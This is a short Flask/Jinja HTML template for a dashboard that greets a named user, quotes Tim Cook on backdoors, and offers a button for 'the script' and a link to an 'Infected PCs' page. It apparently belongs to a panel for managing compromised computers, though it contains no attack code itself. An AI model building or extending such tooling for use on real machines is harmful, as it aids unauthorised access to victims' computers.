{% extends 'layout.html' %}

{% block content %}
<h1 class="display-3">Welcome back, Secioreanu Ionel Stefanita!</h1>
<blockquote>
If you put a key under the mat for the cops, a burglar can find it, too. Criminals are using every technology tool at their disposal to hack into people’s accounts. If they know there’s a key hidden somewhere, they won’t stop until they find it.  <span>Tim Cook</span>
</blockquote>
<button id="myBtn" type="button" class="btn btn-primary btn-lg btn-block">Easy acces to the script</button>
<a class="btn btn-primary btn-lg btn-block" href="/infectedPCS">Infected PCs</a>

<div class="centrat">

</div>

<div class="centrat">

</div>
<div class="centrat">

</div>
{% endblock %}